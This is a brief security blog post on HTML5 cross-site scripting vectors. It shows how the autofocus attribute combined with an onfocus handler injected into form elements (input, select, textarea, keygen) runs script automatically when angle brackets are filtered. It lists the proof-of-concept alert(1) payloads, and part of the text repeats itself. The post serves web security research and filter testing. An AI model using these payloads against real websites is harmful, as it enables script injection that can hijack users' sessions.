HTML5 new XSS vectors

By Gareth Heyes (@hackvertor)

Published 16 years 5 months ago • Last updated April 10, 2025 • ⏱️ < 1 min read

So I posted some new XSS vectors on twitter and I thought I'd share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now :) We have a brand new way of auto executing XSS.

Normally when you find a XSS hole within a input element that has filtered < and > you can't exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)>

We use the "autofocus" feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

← Back to articles

HTML5 new XSS vectors

By Gareth Heyes (@hackvertor)

Published 16 years 5 months ago • Last updated April 10, 2025 • ⏱️ < 1 min read

← Back to articles

Normally when you find a XSS hole within a input element that has filtered < and > you can't exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

<input type="text" AUTOFOCUS onfocus=alert(1)>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

← Back to articles